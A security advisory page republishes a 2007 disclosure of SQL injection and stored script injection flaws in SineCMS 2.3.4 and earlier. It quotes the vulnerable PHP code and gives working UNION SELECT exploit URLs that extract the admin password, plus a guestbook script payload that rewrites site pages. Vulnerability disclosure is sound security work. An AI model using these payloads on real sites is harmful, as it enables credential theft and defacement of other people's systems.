|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 3444 CVE : CVE-2007-6366 CVE : CVE-2007-6367 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : KiNgOfThEwOrLd Published : 16.12.2007
Advisory Content : --------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |_______ _____/ |_ /_ |/ |_ | |/ | | _(__ <_/ ___ __ ______ | __ | | | | |/ ___| | /_____/ | || | |___|___| /__| /______ /___ >__| |___||__| /______| / / --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- SineCMS <= 2.3.4 Calendar SQL Injection 'n something else.. --------------------------------------------------------------- #By KiNgOfThEwOrLd --------------------------------------------------------------- Notes: Only with magic_quotes_gpc -> Off --------------------------------------------------------------- Corrupted file: mods/Calendar/index.php --------------------------------------------------------------- Corrupted code: [...] function Evento ($sine){ if (!isset($_GET[id]) OR $_GET[id]=="") { header("Location: index.php"); } $query = "SELECT * FROM ".$sine[db][prefisso_tab]."calendario WHERE id='$_GET[id]'"; if ($_GET[id]){ $result = mysql_query($query, $sine[db][db]); $row = mysql_fetch_array($result); [...] --------------------------------------------------------------- Exploit: http://[target]/[sinecms_path]/mods.php?mods=Calendar&action=info&id='+u nion+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/* --------------------------------------------------------------- Something else.. There are a lots of useless sql injection in the admin panel, like... http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Guestbook&action= modifica&id='+union+select+1,2,3,4,password,6+from+sine_configuration/* http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&mese=11' +union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/* http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&action=m odify&id='+union+select+1,2,3,4,password,6,7,8,9+from+sine_configuration /* http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&anno='+u nion+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/* and much more.. --------------------------------------------------------------- There is also a permanent html injection in the guestbook, and i belive it can be considered so dangerous, coz the "last comments" module it's included in all the pages...then, an attacker can rewrite alle the pages posting a comment like <script>document.body.innerHTML="[Arbitrary_Code]";</script> in the "username" or "comment" field. ---------------------------------------------------------------  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libopie __readrec() off-by-one
This advisory is related to new FreeBSD advisory FreeBSD-SA-10:05.opie. |
||
| Apache |  |
|
» Apache ActiveMQ 5.4.0 |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2010-04-23| Copyright © SecurityReason.com. All Rights Reserved. |